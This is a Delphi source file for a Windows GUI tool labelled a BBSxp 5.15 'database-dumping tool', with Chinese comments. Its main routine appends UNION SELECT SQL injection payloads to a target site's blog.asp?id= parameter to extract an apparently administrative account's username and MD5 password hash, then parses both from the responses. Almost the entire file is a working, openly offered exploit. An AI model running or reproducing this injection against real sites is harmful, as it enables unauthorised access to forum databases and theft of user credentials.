unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
IdHTTP, StdCtrls, IdAntiFreezeBase, IdAntiFreeze, WinHTTP, ComCtrls,
ExtCtrls, WinSkinData;

type
TForm1 = class(TForm)
Edit1: TEdit;
Edit2: TEdit;
Edit3: TEdit;
Button1: TButton;
IdHTTP1: TIdHTTP;
WinHTTP1: TWinHTTP;
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
Bevel1: TBevel;
Button2: TButton;
StatusBar1: TStatusBar;
procedure Button1Click(Sender: TObject);
procedure WinHTTP1Done(Sender: TObject; const ContentType: String;
FileSize: Integer; Stream: TStream);
procedure WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
Stream: TStream);
procedure Button2Click(Sender: TObject);
procedure Edit3Change(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{ $R *.dfm }

procedure TForm1.Button1Click(Sender: TObject);
var
s1:string;
url1,url2:string;
i:integer;
begin
if edit1.Text ='' then
begin
showmessage(' 请输入网址先！');
exit;
end;
url1:=edit1.Text+'blog.asp?id=1%20union%20select%20top%201%201,[username],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
url2:=edit1.Text+'blog.asp?id=1%20union%20select%20top%201%201,[userpass],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
//---------------------------暴账号（idHTTP）-----------------------
try
Form1.Caption :='正在暴取账号......';
s1:=idHTTP1.Get(url1);
if pos('username',s1)<>0 then
begin
i:=pos('username',s1);
s1:=copy(s1,i+9,15); //账号位数不固定，但最长不得超过12位
i:=pos('">',s1);
s1:=copy(s1,1,i-1); //取得账号
edit2.Text :=s1;
idHTTP1.Disconnect ; //断开连接
end
else
begin
Form1.Caption :='[BBSxp 5.15]暴库工具 ';
showmessage('暴库失败！可能不存在此漏洞！');
idHTTP1.Disconnect ; //断开连接
exit;
end;
except
Form1.Caption :='[BBSxp 5.15]暴库工具 ';
showmessage('网络超时或其他错误！');
idHTTP1.Disconnect ;
exit; //如果错误就退出 ，不继续下面的代码
end;
//----------暴账号完毕-------------
//----如果暴账号成功，那暴密码肯定也成功，则继续下面的代码
//-----------------------------暴密码（WinHTTP）------------------------
Form1.Caption :='正在暴取密码......';
WinHTTP1.URL :=url2;
WinHTTP1.Read;
//-----接 WinHTTP1Done 和 WinHTTP1HTTPError----------
end;

//-------WinHTTP1Done 和 WinHTTP1HTTPError 的代码要一致，因为暴密码一般都是在Error状态下----
procedure TForm1.WinHTTP1Done(Sender: TObject; const ContentType: String;
FileSize: Integer; Stream: TStream);
var
s2:string;
i:integer;
begin
with Stream as TMemoryStream do
begin
SetLength(s2,size);
Stream.Read(s2[1],size);
end;
if pos('username',s2)<>0 then
begin
i:=pos('username',s2);
s2:=copy(s2,i+9,32); //这里为固定的32位MD5加密，可以直接取32个字符即得密码
edit3.Text :=s2;
end;
end;

procedure TForm1.WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
Stream: TStream);
var
s2:string;
i:integer;
begin
with Stream as TMemoryStream do
begin
SetLength(s2,size);
Stream.Read(s2[1],size);
end;
if pos('username',s2)<>0 then
begin
i:=pos('username',s2);
s2:=copy(s2,i+9,32); //这里为固定的32位MD5加密，可以直接取32个字符即得密码
edit3.Text :=s2;
end;

end;

procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;

procedure TForm1.Edit3Change(Sender: TObject);
begin
Form1.Caption :='[BBSxp 5.15]暴库工具 ';
end;


end.

OVER